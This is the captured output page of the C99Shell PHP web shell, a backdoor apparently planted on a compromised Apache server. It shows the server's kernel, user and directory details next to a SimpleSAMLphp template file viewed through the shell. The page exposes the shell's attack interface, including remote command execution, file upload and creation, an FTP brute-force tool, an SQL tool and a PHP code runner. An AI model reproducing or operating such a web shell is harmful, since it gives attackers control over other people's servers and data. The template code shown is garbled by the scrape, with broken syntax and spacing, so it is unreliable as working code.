!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/3ros/simplesamlphp/templates/   drwxrwxr-x
Free 14.57 GB of 61.93 GB (23.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     metadata.php (1.71 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$this
->data['header'] = $this->t('metadata_' $this->data['header']);
$this->includeAtTemplateBase('includes/header.php');
?>


        <h2><?php echo $this->data['header']; ?></h2>
        
        <p><?php echo $this->t('metadata_intro'); ?></p>
        
        <?php if (isset($this->data['metaurl'])) { ?>
            <p><?php echo($this->t('metadata_xmlurl', array('%METAURL%' => htmlspecialchars($this->data['metaurl'])))); ?><br />
            <input type="text" style="width: 90%" value="<?php echo htmlspecialchars($this->data['metaurl']); ?>" /></p>
        <?php ?>
        <h2><?php echo($this->t('metadata_metadata')); ?></h2>
        
        <p><?php echo($this->t('metadata_xmlformat')); ?></p>
        
        <pre class="metadatabox"><?php echo $this->data['metadata']; ?>
</pre>
        
        
        <p><?php echo($this->t('metadata_simplesamlformat')); ?></p>
        
        <pre class="metadatabox"><?php echo $this->data['metadataflat']; ?>
</pre>
        
        
<?php
if(array_key_exists('available_certs'$this->data)) {    ?>
    <h2><?php echo($this->t('metadata_cert')); ?></h2>
    <p><?php echo($this->t('metadata_cert_intro')); ?></p>
    <ul>
    <?php
    
foreach(array_keys($this->data['available_certs']) as $certName) {
        echo (
'<li><a href="'.
            
htmlspecialchars(SimpleSAML_Module::getModuleURL('saml/idp/certs.php').'/'.$certName).'">'.$certName.'</a>');
        if(
$this->data['available_certs'][$certName]['certFingerprint'][0] == 'afe71c28ef740bc87425be13a2263d37971da1f9') {
            echo (
'&nbsp; <img style="display: inline;" src="/' $this->data['baseurlpath'] .
            
'resources/icons/silk/exclamation.png" alt="default certificate" />
            This is the default certificate. Generate a new certificate if this is a production system.'
);
        }
        echo 
'</li>';
    }
    echo 
'</ul>';
}
?>
        


<?php $this->includeAtTemplateBase('includes/footer.php'); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.6175 ]--